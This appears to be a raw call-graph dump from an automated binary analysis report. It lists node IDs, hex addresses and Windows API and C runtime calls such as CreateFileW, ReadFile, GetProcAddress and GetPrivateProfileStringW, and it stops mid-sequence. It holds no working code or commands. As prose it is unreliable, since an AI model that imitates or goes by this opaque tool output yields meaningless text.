39757->39735 39759 403b02 39758->39759 39760 40ae18 9 API calls 39759->39760 39762 403b37 39760->39762 39761 40ae51 9 API calls 39761->39762 39762->39761 39763 403bdb 39762->39763 39764 40add4 wcscmp wcscmp 39762->39764 39767 40ae18 9 API calls 39762->39767 39768 40aebe FindClose 39762->39768 39769 40a8d0 7 API calls 39762->39769 39765 40aebe FindClose 39763->39765 39764->39762 39766 403be6 39765->39766 39766->39755 39767->39762 39768->39762 39769->39762 39771 409d1f 6 API calls 39770->39771 39772 404190 39771->39772 39785 409b98 GetFileAttributesW 39772->39785 39774 40419c 39775 4041a7 6 API calls 39774->39775 39776 40435c 39774->39776 39778 40424f 39775->39778 39776->39114 39778->39776 39779 40425e memset 39778->39779 39781 409d1f 6 API calls 39778->39781 39782 40a8ab 9 API calls 39778->39782 39786 414842 39778->39786 39779->39778 39780 404296 wcscpy 39779->39780 39780->39778 39781->39778 39783 4042b6 memset memset _snwprintf wcscpy 39782->39783 39783->39778 39784->39112 39785->39774 39789 41443e 39786->39789 39788 414866 39788->39778 39790 41444b 39789->39790 39791 414451 39790->39791 39792 4144a3 GetPrivateProfileStringW 39790->39792 39793 414491 39791->39793 39794 414455 wcschr 39791->39794 39792->39788 39796 414495 WritePrivateProfileStringW 39793->39796 39794->39793 39795 414463 _snwprintf 39794->39795 39795->39796 39796->39788 39797->39118 40063 413f4f 40036->40063 40039 413f37 K32GetModuleFileNameExW 40040 413f4a 40039->40040 40040->39180 40042 413969 wcscpy 40041->40042 40043 41396c wcschr 40041->40043 40046 413a3a 40042->40046 40043->40042 40045 41398e 40043->40045 40068 4097f7 wcslen wcslen _memicmp 40045->40068 40046->39180 40048 41399a 40049 4139a4 memset 40048->40049 40050 4139e6 40048->40050 40069 409dd5 GetWindowsDirectoryW wcscpy 40049->40069 40052 413a31 wcscpy 40050->40052 40053 4139ec memset 40050->40053 40052->40046 40070 409dd5 GetWindowsDirectoryW wcscpy 40053->40070 40054 4139c9 wcscpy wcscat 40054->40046 40056 413a11 memcpy wcscat 40056->40046 40058 413cb0 GetModuleHandleW 40057->40058 40059 413cda 40057->40059 40058->40059 40060 413cbf GetProcAddress 40058->40060 40061 413ce3 GetProcessTimes 40059->40061 40062 413cf6 40059->40062 40060->40059 40061->39183 40062->39183 40064 413f2f 40063->40064 40065 413f54 40063->40065 40064->40039 40064->40040 40066 40a804 8 API calls 40065->40066 40067 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40066->40067 40067->40064 40068->40048 40069->40054 40070->40056 40071->39203 40072->39226 40074 409cf9 GetVersionExW 40073->40074 40075 409d0a 40073->40075 40074->40075 40075->39233 40075->39236 40076->39239 40077->39242 40078->39244 40079->39310 40081 40bba5 40080->40081 40128 40cc26 40081->40128 40084 40bd4b 40149 40cc0c 40084->40149 40089 40b2cc 27 API calls 40090 40bbef 40089->40090 40156 40ccf0 _wcsicmp 40090->40156 40092 40bbf5 40092->40084 40157 40ccb4 6 API calls 40092->40157 40094 40bc26 40095 40cf04 17 API calls 40094->40095 40096 40bc2e 40095->40096 40097 40bd43 40096->40097 40098 40b2cc 27 API calls 40096->40098 40099 40cc0c 4 API calls 40097->40099 40100 40bc40 40098->40100 40099->40084 40158 40ccf0 _wcsicmp 40100->40158 40102 40bc46 40102->40097 40103 40bc61 memset memset WideCharToMultiByte 40102->40103 40159 40103c strlen 40103->40159 40105 40bcc0 40106 40b273 27 API calls 40105->40106 40107 40bcd0 memcmp 40106->40107 40107->40097 40108 40bce2 40107->40108 40109 404423 37 API calls 40108->40109 40110 40bd10 40109->40110 40110->40097 40111 40bd3a LocalFree 40110->40111 40112 40bd1f memcpy 40110->40112 40111->40097 40112->40111 40113->39324 40115 409a74 GetTempFileNameW 40114->40115 40116 409a66 GetWindowsDirectoryW 40114->40116 40115->39321 40116->40115 40117->39362 40118->39362 40119->39362 40120->39362 40121->39362 40122->39362 40123->39362 40124->39362 40125->39362 40126->39337 40127->39359 40160 4096c3 CreateFileW 40128->40160 40130 40cc34 40131 40cc3d GetFileSize 40130->40131 40132 40bbca 40130->40132 40133 40afcf 2 API calls 40131->40133 40132->40084 40140 40cf04 40132->40140 40134 40cc64 40133->40134 40161 40a2ef ReadFile 40134->40161 40136 40cc71 40162 40ab4a MultiByteToWideChar 40136->40162 40138 40cc95 CloseHandle 40139 40b04b ??3@YAXPAX 40138->40139 40139->40132 40141 40b633 free 40140->40141 40142 40cf14 40141->40142 40168 40b1ab free free 40142->40168 40144 40bbdd 40144->40084 40144->40089 40145 40cf1b 40145->40144 40147 40cfef 40145->40147 40169 40cd4b 40145->40169 40148 40cd4b 14 API calls 40147->40148 40148->40144 40150 40b633 free 40149->40150 40151 40cc15 40150->40151 40152 40aa04 free 40151->40152 40153 40cc1d 40152->40153 40215 40b1ab free free 40153->40215 40155 40b7d4 memset CreateFileW 40155->39316 40155->39317 40156->40092 40157->40094 40158->40102 40159->40105 40160->40130 40161->40136 40163 40ab6b 40162->40163 40167 40ab93 40162->40167 40164 40a9ce 4 API calls 40163->40164 40165 40ab74 40164->40165 40166 40ab7c MultiByteToWideChar 40165->40166 40166->40167 40167->40138 40168->40145 40170 40cd7b 40169->40170 40203 40aa29 6 API calls 40170->40203 40172 40cef5 40173 40aa04 free 40172->40173 40174 40cefd 40173->40174 40174->40145 40175 40cd89 40175->40172 40204 40aa29 6 API calls 40175->40204 40177 40ce1d 40205 40aa29 6 API calls 40177->40205 40179 40ce3e 40180 40ce6a 40179->40180 40206 40abb7 wcslen memmove 40179->40206 40181 40ce9f 40180->40181 40209 40abb7 wcslen memmove 40180->40209 40212 40a8d0 7 API calls 40181->40212 40184 40ce56 40207 40aa71 wcslen 40184->40207 40186 40ceb5 40213 40a8d0 7 API calls 40186->40213 40188 40ce8b 40210 40aa71 wcslen 40188->40210 40189 40ce5e 40208 40abb7 wcslen memmove 40189->40208 40191 40ce93 40211 40abb7 wcslen memmove 40191->40211 40195 40cecb 40214 40d00b malloc memcpy free free 40195->40214 40197 40cedd 40198 40aa04 free 40197->40198 40199 40cee5 40198->40199 40200 40aa04 free 40199->40200 40201 40ceed 40200->40201 40202 40aa04 free 40201->40202 40202->40172 40203->40175 40204->40177 40205->40179 40206->40184 40207->40189 40208->40180 40209->40188 40210->40191 40211->40181 40212->40186 40213->40195 40214->40197 40215->40155 40216->39378 40217->39385 40227 44def7 40228 44df07 40227->40228 40229 44df00 ??3@YAXPAX 40227->40229 40230 44df17 40228->40230 40231 44df10 ??3@YAXPAX 40228->40231 40229->40228 40232 44df27 40230->40232 40233 44df20 ??3@YAXPAX 40230->40233 40231->40230 40234 44df37 40232->40234 40235 44df30 ??3@YAXPAX 40232->40235 40233->40232 40235->40234 37581 44dea5 37582 44deb5 FreeLibrary 37581->37582 37583 44dec3 37581->37583 37582->37583 40236 4148b6 FindResourceW 40237 4148f9 40236->40237 40238 4148cf SizeofResource 40236->40238 40238->40237 40239 4148e0 LoadResource 40238->40239 40239->40237 40240 4148ee LockResource 40239->40240 40240->40237 37760 415304 free 40241 441b3f 40251 43a9f6 40241->40251 40243 441b61 40424 4386af memset 40243->40424 40245 44189a 40246 442bd4 40245->40246 40247 4418e2 40245->40247 40248 4418ea 40246->40248 40426 441409 memset 40246->40426 40247->40248 40425 4414a9 12 API calls 40247->40425 40252 43aa20 40251->40252 40253 43aadf 40251->40253 40252->40253 40254 43aa34 memset 40252->40254 40253->40243 40255 43aa56 40254->40255 40256 43aa4d 40254->40256 40427 43a6e7 40255->40427 40435 42c02e memset 40256->40435 40261 43aad3 40437 4169a7 11 API calls 40261->40437 40262 43aaae 40262->40253 40262->40261 40277 43aae5 40262->40277 40263 43ac18 40266 43ac47 40263->40266 40439 42bbd5 memcpy memcpy memcpy memset memcpy 40263->40439 40267 43aca8 40266->40267 40440 438eed 16 API calls 40266->40440 40270 43acd5 40267->40270 40442 4233ae 11 API calls 40267->40442 40443 423426 11 API calls 40270->40443 40271 43ac87 40441 4233c5 16 API calls 40271->40441 40275 43ace1 40444 439811 163 API calls 40275->40444 40276 43a9f6 161 API calls 40276->40277 40277->40253 40277->40263 40277->40276 40438 439bbb 22 API calls 40277->40438 40279 43acfd 40284 43ad2c 40279->40284 40445 438eed 16 API calls 40279->40445 40281 43ad19 40446 4233c5 16 API calls 40281->40446 40282 43ad58 40447 44081d 163 API calls 40282->40447 40284->40282 40288 43add9 40284->40288 40287 43ae3a memset 40289 43ae73 40287->40289 40288->40288 40451 423426 11 API calls 40288->40451 40452 42e1c0 147 API calls 40289->40452 40290 43adab 40449 438c4e 163 API calls 40290->40449 40293 43ad6c 40293->40253 40293->40290 40448 42370b memset memcpy memset 40293->40448 40295 43adcc 40450 440f84 12 API calls 40295->40450 40296 43ae96 40453 42e1c0 147 API calls 40296->40453 40299 43aea8 40300 43aec1 40299->40300 40454 42e199 147 API calls 40299->40454 40301 43af00 40300->40301 40455 42e1c0 147 API calls 40300->40455 40301->40253 40305 43af1a 40301->40305 40306 43b3d9 40301->40306 40456 438eed 16 API calls 40305->40456 40311 43b3f6 40306->40311 40315 43b4c8 40306->40315 40308 43b60f 40308->40253 40515 4393a5 17 API calls 40308->40515 40310 43af2f 40457 4233c5 16 API calls 40310->40457 40497 432878 12 API calls 40311->40497 40313 43af51 40458 423426 11 API calls 40313->40458 40323 43b4f2 40315->40323 40503 42bbd5 memcpy memcpy memcpy memset memcpy 40315->40503 40317 43af7d 40459 423426 11 API calls 40317->40459 40321 43b529 40505 44081d 163 API calls 40321->40505 40322 43af94 40460 423330 11 API calls 40322->40460 40504 43a76c 21 API calls 40323->40504 40327 43afca 40461 423330 11 API calls 40327->40461 40328 43b47e 40331 43b497 40328->40331 40500 42374a memcpy memset memcpy memcpy memcpy 40328->40500 40329 43b544 40332 43b55c 40329->40332 40506 42c02e memset 40329->40506 40501 4233ae 11 API calls 40331->40501 40507 43a87a 163 API calls 40332->40507 40333 43afdb 40462 4233ae 11 API calls 40333->40462 40338 43b428 40349 43b462 40338->40349 40498 432b60 16 API calls 40338->40498 40340 43b56c 40343 43b58a 40340->40343 40508 423330 11 API calls 40340->40508 40341 43b4b1 40502 423399 11 API calls 40341->40502 40342 43afee 40463 44081d 163 API calls 40342->40463 40509 440f84 12 API calls 40343->40509 40345 43b4c1 40511 42db80 163 API calls 40345->40511 40499 423330 11 API calls 40349->40499 40351 43b592 40510 43a82f 16 API calls 40351->40510 40354 43b5b4 40512 438c4e 163 API calls 40354->40512 40356 43b5cf 40513 42c02e memset 40356->40513 40358 43b005 40358->40253 40362 43b01f 40358->40362 40464 42d836 163 API calls 40358->40464 40359 43b1ef 40474 4233c5 16 API calls 40359->40474 40362->40359 40472 423330 11 API calls 40362->40472 40473 42d71d 163 API calls 40362->40473 40363 43b212 40475 423330 11 API calls 40363->40475 40364 43b087 40465 4233ae 11 API calls 40364->40465 40365 43add4 40365->40308 40514 438f86 16 API calls 40365->40514 40369 43b22a 40476 42ccb5 11 API calls 40369->40476 40372 43b23f 40477 4233ae 11 API calls 40372->40477 40373 43b10f 40468 423330 11 API calls 40373->40468 40375 43b257 40478 4233ae 11 API calls 40375->40478 40379 43b129 40469 4233ae 11 API calls 40379->40469 40380 43b26e 40479 4233ae 11 API calls 40380->40479 40383 43b09a 40383->40373 40466 42cc15 19 API calls 40383->40466 40467 4233ae 11 API calls 40383->40467 40384 43b282 40480 43a87a 163 API calls 40384->40480 40386 43b13c 40470 440f84 12 API calls 40386->40470 40388 43b29d 40481 423330 11 API calls 40388->40481 40391 43b15f 40471 4233ae 11 API calls 40391->40471 40392 43b2af 40394 43b2b8 40392->40394 40395 43b2ce 40392->40395 40482 4233ae 11 API calls 40394->40482 40483 440f84 12 API calls 40395->40483 40398 43b2c9 40485 4233ae 11 API calls 40398->40485 40399 43b2da 40484 42370b memset memcpy memset 40399->40484 40402 43b2f9 40486 423330 11 API calls 40402->40486 40404 43b30b 40487 423330 11 API calls 40404->40487 40406 43b325 40488 423399 11 API calls 40406->40488 40408 43b332 40489 4233ae 11 API calls 40408->40489 40410 43b354 40490 423399 11 API calls 40410->40490 40412 43b364 40491 43a82f 16 API calls 40412->40491 40414 43b370 40492 42db80 163 API calls 40414->40492 40416 43b380 40493 438c4e 163 API calls 40416->40493 40418 43b39e 40494 423399 11 API calls 40418->40494 40420 43b3ae 40495 43a76c 21 API calls 40420->40495 40422 43b3c3 40496 423399 11 API calls 40422->40496 40424->40245 40425->40248 40426->40246 40428 43a6f5 40427->40428 40434 43a765 40427->40434 40428->40434 40516 42a115 40428->40516 40432 43a73d 40433 42a115 147 API calls 40432->40433 40432->40434 40433->40434 40434->40253 40436 4397fd memset 40434->40436 40435->40255 40436->40262 40437->40253 40438->40277 40439->40266 40440->40271 40441->40267 40442->40270 40443->40275 40444->40279 40445->40281 40446->40284 40447->40293 40448->40290 40449->40295 40450->40365 40451->40287 40452->40296 40453->40299 40454->40300 40455->40300 40456->40310 40457->40313 40458->40317 40459->40322 40460->40327 40461->40333 40462->40342 40463->40358 40464->40364 40465->40383 40466->40383 40467->40383 40468->40379 40469->40386 40470->40391 40471->40362 40472->40362 40473->40362 40474->40363 40475->40369 40476->40372 40477->40375 40478->40380 40479->40384 40480->40388 40481->40392 40482->40398 40483->40399 40484->40398 40485->40402 40486->40404 40487->40406 40488->40408 40489->40410 40490->40412 40491->40414 40492->40416 40493->40418 40494->40420 40495->40422 40496->40365 40497->40338 40498->40349 40499->40328 40500->40331 40501->40341 40502->40345 40503->40323 40504->40321 40505->40329 40506->40332 40507->40340 40508->40343 40509->40351 40510->40345 40511->40354 40512->40356 40513->40365 40514->40308 40515->40253 40517 42a175 40516->40517 40519 42a122 40516->40519 40517->40434 40522 42b13b 147 API calls 40517->40522 40519->40517 40520 42a115 147 API calls 40519->40520 40523 43a174 40519->40523 40547 42a0a8 147 API calls 40519->40547 40520->40519 40522->40432 40537 43a196 40523->40537 40538 43a19e 40523->40538 40524 43a306 40524->40537 40560 4388c4 14 API calls 40524->40560 40527 42a115 147 API calls 40527->40538 40528 415a91 memset 40528->40538 40529 43a642 40529->40537 40564 4169a7 11 API calls 40529->40564 40531 4165ff 11 API calls 40531->40538 40533 43a635 40563 42c02e memset 40533->40563 40537->40519 40538->40524 40538->40527 40538->40528 40538->40531 40538->40537 40548 42ff8c 40538->40548 40556 439504 13 API calls 40538->40556 40557 4312d0 147 API calls 40538->40557 40558 42be4c memcpy memcpy memcpy memset memcpy 40538->40558 40559 43a121 11 API calls 40538->40559 40540 4169a7 11 API calls 40541 43a325 40540->40541 40541->40529 40541->40533 40541->40537 40541->40540 40542 42b5b5 memset memcpy 40541->40542 40543 42bf4c 14 API calls 40541->40543 40546 4165ff 11 API calls 40541->40546 40561 42b63e 14 API calls 40541->40561 40562 42bfcf memcpy 40541->40562 40542->40541 40543->40541 40546->40541 40547->40519 40549 43817e 139 API calls 40548->40549 40550 42ff99 40549->40550 40551 42ffe3 40550->40551 40552 42ffd0 40550->40552 40555 42ff9d 40550->40555 40566 4169a7 11 API calls 40551->40566 40565 4169a7 11 API calls 40552->40565 40555->40538 40556->40538 40557->40538 40558->40538 40559->40538 40560->40541 40561->40541 40562->40541 40563->40529 40564->40537 40565->40555 40566->40555 40588 41493c EnumResourceNamesW 37585 4287c1 37586 4287d2 37585->37586 37587 429ac1 37585->37587 37588 428818 37586->37588 37589 42881f 37586->37589 37603 425711 37586->37603 37602 425ad6 37587->37602 37655 415c56 11 API calls 37587->37655 37622 42013a 37588->37622 37650 420244 97 API calls 37589->37650 37594 4260dd 37649 424251 120 API calls 37594->37649 37596 4259da 37648 416760 11 API calls 37596->37648 37601 429a4d 37605 429a66 37601->37605 37606 429a9b 37601->37606 37603->37587 37603->37596 37603->37601 37604 422aeb memset memcpy memcpy 37603->37604 37608 4260a1 37603->37608 37618 4259c2 37603->37618 37621 425a38 37603->37621 37638 4227f0 memset memcpy 37603->37638 37639 422b84 15 API calls 37603->37639 37640 422b5d memset memcpy memcpy 37603->37640 37641 422640 13 API calls 37603->37641 37643 4241fc 11 API calls 37603->37643 37644 42413a 90 API calls 37603->37644 37604->37603 37651 415c56 11 API calls 37605->37651 37610 429a96 37606->37610 37653 416760 11 API calls 37606->37653 37647 415c56 11 API calls 37608->37647 37654 424251 120 API calls 37610->37654 37613 429a7a 37652 416760 11 API calls 37613->37652 37618->37602 37642 415c56 11 API calls 37618->37642 37621->37618 37645 422640 13 API calls 37621->37645 37646 4226e0 12 API calls 37621->37646 37623 42014c 37622->37623 37626 420151 37622->37626 37665 41e466 97 API calls 37623->37665 37625 420162 37625->37603 37626->37625 37627 4201b3 37626->37627 37628 420229 37626->37628 37629 4201b8 37627->37629 37630 4201dc 37627->37630 37628->37625 37631 41fd5e 86 API calls 37628->37631 37656 41fbdb 37629->37656 37630->37625 37634 4201ff 37630->37634 37662 41fc4c 37630->37662 37631->37625 37634->37625 37637 42013a 97 API calls 37634->37637 37637->37625 37638->37603 37639->37603 37640->37603 37641->37603 37642->37596 37643->37603 37644->37603 37645->37621 37646->37621 37647->37596 37648->37594 37649->37602 37650->37603 37651->37613 37652->37610 37653->37610 37654->37587 37655->37596 37657 41fbf8 37656->37657 37660 41fbf1 37656->37660 37670 41ee26 37657->37670 37661 41fc39 37660->37661 37680 4446ce 11 API calls 37660->37680 37661->37625 37666 41fd5e 37661->37666 37663 41ee6b 86 API calls 37662->37663 37664 41fc5d 37663->37664 37664->37630 37665->37626 37668 41fd65 37666->37668 37667 41fdab 37667->37625 37668->37667 37669 41fbdb 86 API calls 37668->37669 37669->37668 37671 41ee41 37670->37671 37672 41ee32 37670->37672 37681 41edad 37671->37681 37684 4446ce 11 API calls 37672->37684 37675 41ee3c 37675->37660 37678 41ee58 37678->37675 37686 41ee6b 37678->37686 37680->37661 37690 41be52 37681->37690 37684->37675 37685 41eb85 11 API calls 37685->37678 37687 41ee70 37686->37687 37688 41ee78 37686->37688 37746 41bf99 86 API calls 37687->37746 37688->37675 37691 41be6f 37690->37691 37692 41be5f 37690->37692 37697 41be8c 37691->37697 37711 418c63 37691->37711 37725 4446ce 11 API calls 37692->37725 37695 41be69 37695->37675 37695->37685 37697->37695 37698 41bf3a 37697->37698 37699 41bed1 37697->37699 37702 41bee7 37697->37702 37728 4446ce 11 API calls 37698->37728 37701 41bef0 37699->37701 37705 41bee2 37699->37705 37701->37702 37703 41bf01 37701->37703 37702->37695 37729 41a453 86 API calls 37702->37729 37704 41bf24 memset 37703->37704 37709 41bf14 37703->37709 37726 418a6d memset memcpy memset 37703->37726 37704->37695 37715 41ac13 37705->37715 37727 41a223 memset memcpy memset 37709->37727 37710 41bf20 37710->37704 37714 418c72 37711->37714 37712 418c94 37712->37697 37713 418d51 memset memset 37713->37712 37714->37712 37714->37713 37716 41ac52 37715->37716 37717 41ac3f memset 37715->37717 37719 41ac6a 37716->37719 37730 41dc14 19 API calls 37716->37730 37722 41acd9 37717->37722 37721 41aca1 37719->37721 37731 41519d 37719->37731 37721->37722 37723 41acc0 memset 37721->37723 37724 41accd memcpy 37721->37724 37722->37702 37723->37722 37724->37722 37725->37695 37726->37709 37727->37710 37728->37702 37730->37719 37734 4175ed 37731->37734 37742 417570 SetFilePointer 37734->37742 37737 41760a ReadFile 37738 417637 37737->37738 37739 417627 GetLastError 37737->37739 37740 41763e memset 37738->37740 37741 4151b3 37738->37741 37739->37741 37740->37741 37741->37721 37743 4175b2 37742->37743 37744 41759c GetLastError 37742->37744 37743->37737 37743->37741 37744->37743 37745 4175a8 GetLastError 37744->37745 37745->37743 37746->37688 37747 417bc5 37748 417c61 37747->37748 37749 417bda 37747->37749 37749->37748 37750 417bf6 UnmapViewOfFile CloseHandle 37749->37750 37752 417c2c 37749->37752 37754 4175b7 37749->37754 37750->37749 37750->37750 37752->37749 37759 41851e 20 API calls 37752->37759 37755 4175d6 CloseHandle 37754->37755 37756 4175c8 37755->37756 37757 4175df 37755->37757 37756->37757 37758 4175ce Sleep 37756->37758 37757->37749 37758->37755 37759->37752 37766 4415ea 37774 4304b2 37766->37774 37768 4415fe 37769 4418ea 37768->37769 37770 442bd4 37768->37770 37771 4418e2 37768->37771 37770->37769 37822 441409 memset 37770->37822 37771->37769 37821 4414a9 12 API calls 37771->37821 37823 43041c 12 API calls 37774->37823 37776 4304cd 37781 430557 37776->37781 37824 43034a memcpy 37776->37824 37778 4304f3 37778->37781 37825 430468 11 API calls 37778->37825 37780 430506 37780->37781 37782 43057b 37780->37782 37826 43817e 37780->37826 37781->37768 37783 415a91 memset 37782->37783 37785 430584 37783->37785 37785->37781 37831 4397fd memset 37785->37831 37787 4305e4 37787->37781 37832 4328e4 12 API calls 37787->37832 37789 43052d 37789->37781 37789->37782 37792 430542 37789->37792 37791 4305fa 37793 430609 37791->37793 37833 423383 11 API calls 37791->37833 37792->37781 37830 4169a7 11 API calls 37792->37830 37834 423330 11 API calls 37793->37834 37796 430634 37835 423399 11 API calls 37796->37835 37798 430648 37836 4233ae 11 API calls 37798->37836 37800 43066b 37837 423330 11 API calls 37800->37837 37802 43067d 37838 4233ae 11 API calls 37802->37838 37804 430695 37839 423330 11 API calls 37804->37839 37806 4306d6 37841 423330 11 API calls 37806->37841 37807 4306a7 37807->37806 37808 4306c0 37807->37808 37840 4233ae 11 API calls 37808->37840 37811 4306d1 37842 430369 17 API calls 37811->37842 37813 4306f3 37843 423330 11 API calls 37813->37843 37815 430704 37844 423330 11 API calls 37815->37844 37817 430710 37845 423330 11 API calls 37817->37845 37819 43071e 37846 423383 11 API calls 37819->37846 37821->37769 37822->37770 37823->37776 37824->37778 37825->37780 37827 438187 37826->37827 37829 438192 37826->37829 37847 4380f6 37827->37847 37829->37789 37830->37781 37831->37787 37832->37791 37833->37793 37834->37796 37835->37798 37836->37800 37837->37802 37838->37804 37839->37807 37840->37811 37841->37811 37842->37813 37843->37815 37844->37817 37845->37819 37846->37781 37849 43811f 37847->37849 37848 438164 37848->37829 37849->37848 37852 437e5e 37849->37852 37875 4300e8 memset memset memcpy 37849->37875 37876 437d3c 37852->37876 37854 437eb3 37854->37849 37855 437ea9 37855->37854 37860 437f22 37855->37860 37891 41f432 37855->37891 37858 437f06 37941 415c56 11 API calls 37858->37941 37862 437f7f 37860->37862 37942 432d4e 37860->37942 37861 437f95 37946 415c56 11 API calls 37861->37946 37862->37861 37864 43802b 37862->37864 37902 4165ff 37864->37902 37866 437fa3 37866->37854 37949 41f638 104 API calls 37866->37949 37871 43806b 37872 438094 37871->37872 37947 42f50e 138 API calls 37871->37947 37872->37866 37948 4300e8 memset memset memcpy 37872->37948 37875->37849 37877 437d69 37876->37877 37880 437d80 37876->37880 37962 437ccb 11 API calls 37877->37962 37879 437d76 37879->37855 37880->37879 37881 437da3 37880->37881 37883 437d90 37880->37883 37950 438460 37881->37950 37883->37879 37966 437ccb 11 API calls 37883->37966 37885 437de8 37965 424f26 123 API calls 37885->37965 37887 437dcb 37887->37885 37963 444283 13 API calls 37887->37963 37889 437dfc 37964 437ccb 11 API calls 37889->37964 37892 41f54d 37891->37892 37896 41f44f 37891->37896 37893 41f466 37892->37893 38137 41c635 memset memset 37892->38137 37893->37858 37893->37860 37896->37893 37900 41f50b 37896->37900 38108 41f1a5 37896->38108 38133 41c06f memcmp 37896->38133 38134 41f3b1 90 API calls 37896->38134 38135 41f398 86 API calls 37896->38135 37900->37892 37900->37893 38136 41c295 86 API calls 37900->38136 37903 4165a0 11 API calls 37902->37903 37904 41660d 37903->37904 37905 437371 37904->37905 37906 41703f 11 API calls 37905->37906 37907 437399 37906->37907 37908 43739d 37907->37908 37910 4373ac 37907->37910 38246 4446ea 11 API calls 37908->38246 37911 416935 16 API calls 37910->37911 37927 4373ca 37911->37927 37912 437584 37914 4375bc 37912->37914 38253 42453e 123 API calls 37912->38253 37913 438460 134 API calls 37913->37927 37916 415c7d 16 API calls 37914->37916 37917 4375d2 37916->37917 37921 4373a7 37917->37921 38254 4442e6 37917->38254 37920 4375e2 37920->37921 38261 444283 13 API calls 37920->38261 37921->37871 37923 415a91 memset 37923->37927 37926 43758f 38252 42453e 123 API calls 37926->38252 37927->37912 37927->37913 37927->37923 37927->37926 37940 437d3c 135 API calls 37927->37940 38228 4251c4 37927->38228 38247 425433 13 API calls 37927->38247 38248 425413 17 API calls 37927->38248 38249 42533e 16 API calls 37927->38249 38250 42538f 16 API calls 37927->38250 38251 42453e 123 API calls 37927->38251 37930 4375f4 37934 437620 37930->37934 37935 43760b 37930->37935 37932 43759f 37933 416935 16 API calls 37932->37933 37933->37912 37936 416935 16 API calls 37934->37936 38262 444283 13 API calls 37935->38262 37936->37921 37939 437612 memcpy 37939->37921 37940->37927 37941->37854 37943 432d58 37942->37943 37945 432d65 37942->37945 38337 432cc4 memset memset memcpy 37943->38337 37945->37862 37946->37866 37947->37872 37948->37866 37949->37854 37967 41703f 37950->37967 37952 43847a 37953 43848a 37952->37953 37954 43847e 37952->37954 37974 438270 37953->37974 38004 4446ea 11 API calls 37954->38004 37958 438488 37958->37887 37960 4384bb 37961 438270 134 API calls 37960->37961 37961->37958 37962->37879 37963->37889 37964->37885 37965->37879 37966->37879 37968 417044 37967->37968 37969 41705c 37967->37969 37973 417055 37968->37973 38006 416760 11 API calls 37968->38006 37970 417075 37969->37970 38007 41707a 11 API calls 37969->38007 37970->37952 37973->37952 37975 415a91 memset 37974->37975 37976 43828d 37975->37976 37977 438297 37976->37977 37978 438341 37976->37978 37980 4382d6 37976->37980 37979 415c7d 16 API calls 37977->37979 38008 44358f 37978->38008 37982 438458 37979->37982 37983 4382fb 37980->37983 37984 4382db 37980->37984 37982->37958 38005 424f26 123 API calls 37982->38005 38051 415c23 memcpy 37983->38051 38039 416935 37984->38039 37987 438305 37991 44358f 19 API calls 37987->37991 37993 438318 37987->37993 37988 4382e9 38047 415c7d 37988->38047 37990 438373 37996 438383 37990->37996 38052 4300e8 memset memset memcpy 37990->38052 37991->37993 37993->37990 38034 43819e 37993->38034 37995 4383cd 37997 4383f5 37995->37997 38054 42453e 123 API calls 37995->38054 37996->37995 38053 415c23 memcpy 37996->38053 38000 438404 37997->38000 38001 43841c 37997->38001 38003 416935 16 API calls 38000->38003 38002 416935 16 API calls 38001->38002 38002->37977 38003->37977 38004->37958 38005->37960 38006->37973 38007->37968 38009 4435be 38008->38009 38010 44360c 38009->38010 38012 443676 38009->38012 38015 4436ce 38009->38015 38019 44366c 38009->38019 38055 442ff8 38009->38055 38010->37993 38011 443758 38024 443775 38011->38024 38064 441409 memset 38011->38064 38012->38011 38014 443737 38012->38014 38016 442ff8 19 API calls 38012->38016 38017 442ff8 19 API calls 38014->38017 38021 4165ff 11 API calls 38015->38021 38016->38014 38017->38011 38063 4169a7 11 API calls 38019->38063 38020 4437be 38025 4437de 38020->38025 38066 416760 11 API calls 38020->38066 38021->38012 38024->38020 38065 415c56 11 API calls 38024->38065 38028 443801 38025->38028 38067 42463b memset memcpy 38025->38067 38027 443826 38069 43bd08 memset 38027->38069 38028->38027 38068 43024d memset 38028->38068 38032 443837 38032->38010 38070 43024d memset 38032->38070 38035 438246 38034->38035 38037 4381ba 38034->38037 38035->37990 38036 41f432 110 API calls 38036->38037 38037->38035 38037->38036 38086 41f638 104 API calls 38037->38086 38040 41693e 38039->38040 38043 41698e 38039->38043 38041 41694c 38040->38041 38087 422fd1 memset 38040->38087 38041->38043 38088 4165a0 38041->38088 38043->37988 38048 415c81 38047->38048 38049 415c9c 38047->38049 38048->38049 38050 416935 16 API calls 38048->38050 38049->37977 38050->38049 38051->37987 38052->37996 38053->37995 38054->37997 38056 442ffe 38055->38056 38057 443094 38056->38057 38059 443092 38056->38059 38071 4414ff 38056->38071 38083 4169a7 11 API calls 38056->38083 38084 441325 memset 38056->38084 38085 4414a9 12 API calls 38057->38085 38059->38009 38063->38012 38064->38011 38065->38020 38066->38025 38067->38028 38068->38027 38069->38032 38070->38032 38072 441539 38071->38072 38073 441547 38071->38073 38072->38073 38074 441575 38072->38074 38075 441582 38072->38075 38076 4418e2 38073->38076 38082 442bd4 38073->38082 38078 42fccf 18 API calls 38074->38078 38077 43275a 12 API calls 38075->38077 38079 4414a9 12 API calls 38076->38079 38080 4418ea 38076->38080 38077->38073 38078->38073 38079->38080 38080->38056 38081 441409 memset 38081->38082 38082->38080 38082->38081 38083->38056 38084->38056 38085->38059 38086->38037 38087->38041 38094 415cfe 38088->38094 38093 422b84 15 API calls 38093->38043 38095 41628e 38094->38095 38100 415d23 __aullrem __aulldvrm 38094->38100 38102 416520 38095->38102 38096 4163ca 38097 416422 10 API calls 38096->38097 38097->38095 38098 416422 10 API calls 38098->38100 38099 416172 memset 38099->38100 38100->38095 38100->38096 38100->38098 38100->38099 38101 415cb9 10 API calls 38100->38101 38101->38100 38103 416527 38102->38103 38107 416574 38102->38107 38104 415700 10 API calls 38103->38104 38105 416544 38103->38105 38103->38107 38104->38105 38106 416561 memcpy 38105->38106 38105->38107 38106->38107 38107->38043 38107->38093 38138 41bc3b 38108->38138 38111 41edad 86 API calls 38112 41f1cb 38111->38112 38113 41f1f5 memcmp 38112->38113 38114 41f20e 38112->38114 38118 41f282 38112->38118 38113->38114 38115 41f21b memcmp 38114->38115 38114->38118 38116 41f326 38115->38116 38119 41f23d 38115->38119 38117 41ee6b 86 API calls 38116->38117 38116->38118 38117->38118 38118->37896 38119->38116 38120 41f28e memcmp 38119->38120 38162 41c8df 56 API calls 38119->38162 38120->38116 38121 41f2a9 38120->38121 38121->38116 38124 41f308 38121->38124 38125 41f2d8 38121->38125 38123 41f269 38123->38116 38126 41f287 38123->38126 38127 41f27a 38123->38127 38124->38116 38167 4446ce 11 API calls 38124->38167 38128 41ee6b 86 API calls 38125->38128 38126->38120 38129 41ee6b 86 API calls 38127->38129 